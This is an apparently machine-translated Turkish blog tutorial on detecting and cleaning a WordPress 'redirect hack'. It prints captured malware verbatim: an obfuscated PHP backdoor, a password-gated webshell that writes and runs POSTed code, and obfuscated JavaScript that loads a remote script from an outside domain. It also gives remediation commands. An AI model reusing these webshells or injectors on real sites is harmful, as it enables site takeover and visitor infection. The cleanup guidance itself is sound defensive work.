WordPress kesinlikle en çok kullanılan platformdur CMS (Content Management System) hem bloglar hem de başlangıç çevrimiçi mağazaları için (modül ile WooCommerce), bu da onu bilgisayar saldırıları (hackleme) tarafından en çok hedeflenen hale getirir. En çok kullanılan bilgisayar korsanlığı operasyonlarından biri, güvenliği ihlal edilen web sitesini başka web sayfalarına yönlendirmeyi amaçlar. Redirect WordPress Hack 2023, tüm siteyi spam web sayfalarına yönlendirme etkisine sahip veya karşılığında kullanıcıların bilgisayarlarına bulaşabilen nispeten yeni bir kötü amaçlı yazılımdır.
Siteniz geliştirildiyse WordPress başka bir siteye yönlendirilirse, büyük olasılıkla zaten ünlü olan yönlendirme saldırısının kurbanıdır.
Bu eğitimde, yönlendirme bulaşmış bir web sitesini virüsten arındırmak için gerekli bilgileri ve faydalı ipuçlarını bulacaksınız. WordPress Hack (Virus Redirect). Yorumlar aracılığıyla ek bilgi alabilir veya yardım isteyebilirsiniz.
Içerik
Siteleri yönlendiren virüsün tespiti WordPress
Web sitesi trafiğinde ani ve sebepsiz bir düşüş, sipariş sayısında (çevrimiçi mağazalar söz konusu olduğunda) veya reklam gelirinde düşüş, bir şeylerin ters gittiğinin ilk işaretleridir. tespit "Redirect WordPress Hack 2023(Virüs Yönlendirme) web sitesini açtığınızda ve başka bir web sayfasına yönlendirildiğinizde “görsel olarak” da yapılabilir.
Deneyimlere göre, web kötü amaçlı yazılımlarının çoğu internet tarayıcılarıyla uyumludur: Chrome, Firefox, Edge, Opera. Eğer bir bilgisayar kullanıcısıysanız Mac, bu virüsler tarayıcıda gerçekten görünmez Safari. gelen güvenlik sistemi Safari bu kötü amaçlı komut dosyalarını sessizce engelleyin.
Virüs bulaşmış bir web siteniz varsa ne yapmalısınız? Redirect WordPress Hack
Umarım ilk adım paniğe kapılmamak veya web sitesini silmek değildir. Virüslü veya virüslü dosyalar bile ilk başta silinmemelidir. Güvenlik ihlalinin nerede olduğunu ve virüsü neyin etkilediğini anlamanıza yardımcı olabilecek değerli bilgiler içerirler. İşleyiş biçimleri.
Web sitesini halka kapatın.
Bir virüs web sitesini ziyaretçilere nasıl kapatırsınız? En basiti, DNS yöneticisini kullanmak ve "A" (etki alanı adı) için IP'yi silmek veya var olmayan bir IP tanımlamaktır. Böylece, web sitesi ziyaretçileri bundan korunacaktır. redirect WordPress hack bu da onları virüs veya SPAM web sayfalarına yönlendirebilir.
Eğer kullanırsan CloudFlare bir DNS yöneticisi olarak, hesaba giriş yapar ve DNS kayıtlarını silersiniz "A” alan adı için. Böylece, virüsten etkilenen etki alanı IP'siz kalacak ve artık internetten erişilemeyecek.
Web sitesinin IP'sini kopyalar ve ona yalnızca sizin erişebilmeniz için "yönlendirirsiniz". Bilgisayarından.
Bilgisayarlarda bir web sitesinin gerçek IP'si nasıl değiştirilir? Windows?
Yöntem genellikle "hosts" dosyasını düzenleyerek belirli web sitelerine erişimi engellemek için kullanılır.
1. sen aç Notepad veya başka bir metin düzenleyici (haklara sahip) administrator) ve dosyayı düzenleyin "hosts". Şurada bulunur:
C:\Windows\System32\drivers\etc\hosts2. "hosts" dosyasında, web sitenizin gerçek IP'sine "route" ekleyin. IP, yukarıda DNS yöneticisinden silindi.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Dosyayı kaydedin ve tarayıcıda web sitesine erişin.
Web sitesi açılmazsa ve "hosts" dosyasında yanlış bir şey yapmadıysanız, bu büyük olasılıkla bir DNS önbelleğidir.
Bir işletim sisteminde DNS önbelleğini temizlemek için Windows, açık Command Prompt, komutu çalıştırdığınız yer:
ipconfig /flushdnsBilgisayarlarda bir web sitesinin gerçek IP'si nasıl değiştirilir? Mac / MacKitap?
bilgisayar kullanıcıları için Mac bir web sitesinin gerçek IP'sini değiştirmek biraz daha basittir.
1. Yardımcı programı açın Terminal.
2. Komut satırını çalıştırın (çalıştırmak için sistem parolası gerekir):
sudo nano /etc/hosts3. Bilgisayarlarla aynı Windows, etki alanının gerçek IP'sini ekleyin.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Değişiklikleri kaydedin. Ctrl+X (y).
"Yönlendirdikten" sonra, virüs bulaşmış web sitesine erişebilen tek kişi sizsiniz. Redirect WordPress Hack.
Tam web sitesi yedeklemesi – Dosyalar ve veritabanı
Bulaşsa bile “redirect WordPress hack”, tavsiye tüm web sitesinin genel bir yedeğini almanızdır. Dosyalar ve veritabanı. Muhtemelen her iki dosyanın yerel bir kopyasını da kaydedebilirsiniz. public / public_html yanı sıra veritabanı.
Etkilenen dosyaların ve değiştirilenlerin tanımlanması Redirect WordPress Hack 2023
Ana hedef dosyaları WordPress var index.php (kökte), header.php, index.php şi footer.php temanın WordPress varlıklar. Bu dosyaları manuel olarak kontrol edin ve kötü amaçlı kodu veya kötü amaçlı bir komut dosyasını belirleyin.
2023'te bir virüs "Redirect WordPress Hack” koymak index.php formun bir kodu:
(Bu kodları çalıştırmanızı önermiyorum!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Çözüldü, bu kötü amaçlı komut dosyası temelde web sitesine virüs bulaşmasının sonucudur WordPress. Kötü amaçlı yazılımın arkasındaki komut dosyası değil, virüslü web sayfasını yeniden yönlendirmeyi mümkün kılan komut dosyasıdır. Yukarıdaki komut dosyasının kodunu çözersek, şunu elde ederiz:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Bu kodu içeren sunucudaki tüm dosyaları tanımlamak için erişime sahip olmak iyidir SSH üzerinde dosya denetimi ve yönetimi komut satırlarını çalıştırmak için sunucuya Linux.
Aşağıda, yakın zamanda değiştirilen dosyaları ve belirli bir kodu (dize) içeren dosyaları tanımlamaya kesinlikle yardımcı olan iki komut bulunmaktadır.
nasıl görüyorsun Linux PHP dosyaları son 24 saatte mi yoksa başka bir zaman diliminde mi değişti?
Sipariş "find” kullanımı çok basittir ve süreyi, arama yolunu ve dosya türlerini ayarlamak için özelleştirmeye izin verir.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"Çıktıda, dosyanın değiştirildiği tarih ve saat, yazma / okuma / çalıştırma izinleri (chmod) ve hangi gruba/kullanıcıya ait olduğu.
Daha fazla gün önce kontrol etmek istiyorsanız, değeri değiştirin "-mtime -1" veya kullan "-mmin -360” dakikalarca (6 saat).
PHP, Java dosyaları içinde bir kod (dize) nasıl aranır?
Belirli bir kodu içeren tüm PHP veya Java dosyalarını hızlı bir şekilde bulmanızı sağlayan "bul" komut satırı aşağıdaki gibidir:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Komut dosyaları arayacak ve görüntüleyecektir. .php şi .js kapsamak "uJjBRODYsU".
Yukarıdaki iki komutun yardımıyla, hangi dosyaların son zamanlarda değiştirildiğini ve hangilerinin kötü amaçlı yazılım kodu içerdiğini çok kolay bir şekilde öğreneceksiniz.
Doğru koddan ödün vermeden değiştirilmiş dosyalardan kötü amaçlı kodu kaldırır. Benim senaryomda, kötü amaçlı yazılım açılmadan önce yerleştirildi <head>.
İlk "bul" komutunu çalıştırırken, sunucuda size ait olmayan yeni dosyalar keşfetmeniz çok olasıdır. WordPress ne de oraya senin tarafından koy. Virüs türüne ait dosyalar Redirect WordPress Hack.
İncelediğim senaryoda “formundaki dosyalarwp-log-nOXdgD.php". Bunlar, virüs tarafından yeniden yönlendirme için kullanılan kötü amaçlı yazılım kodunu da içeren "doğma" dosyalarıdır.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}" türündeki dosyaların amacıwp-log-*” yönlendirme hack virüsünü sunucuda barındırılan diğer web sitelerine yaymaktır. Bu, “türünde bir kötü amaçlı yazılım kodudur.webshelloluşan bir temel bölüm (bazı şifrelenmiş değişkenlerin tanımlandığı) ve o yürütme bölümü Saldırganın sisteme kötü amaçlı bir kod yüklemeye ve yürütmeye çalıştığı.
bir değişken varsa POST adlıbh' ve şifrelenmiş değeri MD5 eşittir "8f1f964a4b4d8d1ac3f0386693d28d03", ardından komut dosyası şifrelenmiş içeriği yazıyor gibi görünür base64 adlı başka bir değişkeninb3' geçici bir dosyada ve sonra bu geçici dosyayı dahil etmeye çalışır.
bir değişken varsa POST veya GET adlıtick', komut dosyası değeri ile yanıt verecektir MD5 dizinin "885".
Bu kodu içeren sunucudaki tüm dosyaları tanımlamak için, ortak olan bir dizi seçin ve ardından “ komutunu çalıştırın.find” (yukarıdakine benzer). Bu kötü amaçlı yazılım kodunu içeren tüm dosyaları silin.
tarafından istismar edilen güvenlik açığı Redirect WordPress Hack
Büyük olasılıkla bu yönlendirme virüsü aracılığıyla gelir yönetim kullanıcısının istismarı WordPress veya tanımlayarak savunmasız eklenti ayrıcalıklara sahip kullanıcıların eklenmesine izin veren administrator.
Platformda oluşturulmuş çoğu web sitesi için WordPress bu mümkün tema veya eklenti dosyalarını düzenlemeyönetim arayüzünden (Dashboard). Bu nedenle, kötü niyetli bir kişi, yukarıda gösterilen komut dosyalarını oluşturmak için tema dosyalarına kötü amaçlı yazılım kodu ekleyebilir.
Bu tür kötü amaçlı yazılım koduna bir örnek şudur:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript tema başlığında tanımlanan WordPress, etiketi açtıktan hemen sonra <head>.
Bu JavaScript'i deşifre etmek oldukça zordur, ancak dosyaları oluşturmak için büyük olasılıkla diğer komut dosyalarını getirdiği yerden başka bir web adresini sorguladığı açıktır "wp-log-*” yukarıda bahsettiğim.
Bu kodu bulun ve tüm dosyalardan silin PHP etkilenen
Bildiğim kadarıyla bu kod manuel olarak eklendi yönetici ayrıcalıklarına sahip yeni bir kullanıcı tarafından.
Bu nedenle, Panodan kötü amaçlı yazılım eklenmesini önlemek için düzenleme seçeneğini devre dışı bırakmak en iyisidir. WordPress Panodan Temalar / Eklentiler.
dosyayı düzenle wp-config.php ve satırları ekleyin:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Bu değişikliği yaptıktan sonra hiçbir kullanıcı WordPress artık Dashboard'dan dosyaları düzenleyemezsiniz.
rolüne sahip kullanıcıları kontrol edin Administrator
Aşağıda, rolüne sahip kullanıcıları aramak için kullanabileceğiniz bir SQL sorgusu bulunmaktadır. administrator platformda WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Bu sorgu, tablodaki tüm kullanıcıları döndürür wp_users rolü kim verdi administrator. Sorgu tablo için de yapılır. wp_usermeta meta'da aramak içinwp_capabilitiesKullanıcı rolleri hakkında bilgi içeren '.
Başka bir yöntem de onları aşağıdakilerden belirlemektir: Dashboard → Users → All Users → Administrator. Ancak, Dashboard panelinde bir kullanıcının gizlenebileceği uygulamalar vardır. Yani kullanıcıları görmenin en iyi yolu"Administrator"In WordPress yukarıdaki SQL komutudur.
Benim durumumda, veritabanında kullanıcıyı " adıyla tanımladım.wp-import-user". Oldukça müstehcen.
Ayrıca buradan kullanıcının hangi tarih ve saate sahip olduğunu görebilirsiniz. WordPress yaratıldı. Sunucu günlüklerini aradığı için kullanıcı kimliği de çok önemlidir. Bu şekilde, bu kullanıcının tüm aktivitelerini görebilirsiniz.
rolüne sahip kullanıcıları sil administrator hangisini bilmiyorsun o zaman şifreleri değiştir tüm yönetici kullanıcılara. Editör, Yazar, Administrator.
SQL veritabanı kullanıcısının parolasını değiştirin etkilenen web sitesinin.
Bu adımları gerçekleştirdikten sonra, web sitesi tüm kullanıcılar için yeniden başlatılabilir.
Bununla birlikte, yukarıda sunduğum şeyin, bir web sitesine virüs bulaştığı belki de binlerce senaryodan biri olduğunu unutmayın. Redirect WordPress Hack 2023'de.
Web sitenize virüs bulaştıysa ve yardıma ihtiyacınız varsa veya herhangi bir sorunuz varsa, yorumlar bölümü açıktır.
